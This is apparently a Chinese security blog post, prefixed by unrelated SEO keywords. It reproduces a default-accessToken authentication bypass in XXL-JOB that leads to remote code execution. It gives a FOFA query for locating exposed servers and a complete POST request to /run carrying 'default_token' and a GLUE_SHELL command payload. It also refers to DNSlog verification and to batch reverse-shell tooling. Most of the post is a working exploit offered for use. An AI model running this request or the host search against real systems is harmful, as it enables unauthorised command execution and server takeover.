官方网站建设的意义,微信开发者工具怎么下载,网站怎样做移动端适配,网站建设设计公司类网站织梦模板 带手机端文章目录 XXL-JOB默认accessToken身份绕过RCE漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 XXL-JOB默认accessToken身份绕过RCE漏洞复现 [附POC]
0x01 前言
免责声明#xff1a;请勿利用文章内的相关技术从… 文章目录 XXL-JOB默认accessToken身份绕过RCE漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 XXL-JOB默认accessToken身份绕过RCE漏洞复现 [附POC]
0x01 前言
免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用
0x02 漏洞描述
XXL-JOB 是一款开源的分布式任务调度平台用于实现大规模任务的调度和执行。XXL-JOB 默认配置下用于调度通讯的 accessToken 不是随机生成的而是使用 application.properties 配置文件中的默认值。在实际使用中如果没有修改默认值攻击者可利用此绕过认证调用 executor执行任意代码从而获取服务器权限。经分析和研判该漏洞利用难度低可导致远程代码执行。
0x03 影响版本
XXL-JOB0x04 漏洞环境
FOFA语法“invalid request, HttpMethod not support” port“9999”
0x05 漏洞复现
1.访问漏洞环境 2.构造POC
POC POST
POST /run HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 422
Content-Type: application/json
XXL-JOB-ACCESS-TOKEN: default_token
Accept-Encoding: gzip{jobId: 187270,executorHandler: demoJobHandler,executorParams: demoJobHandler,executorBlockStrategy: COVER_EARLY,executorTimeout: 0,logId: 187270,logDateTime: 116989791110,glueType: GLUE_SHELL,glueSource: ping x.x.x.x,glueUpdatetime: 116989791110,broadcastIndex: 0,broadcastTotal: 0
}3.复现
1.执行数据包进行dnslog访问dnslog服务器得到响应 2.XXL-JOB反弹shell利用工具
单个检测 批量检测
漏洞利用反弹shell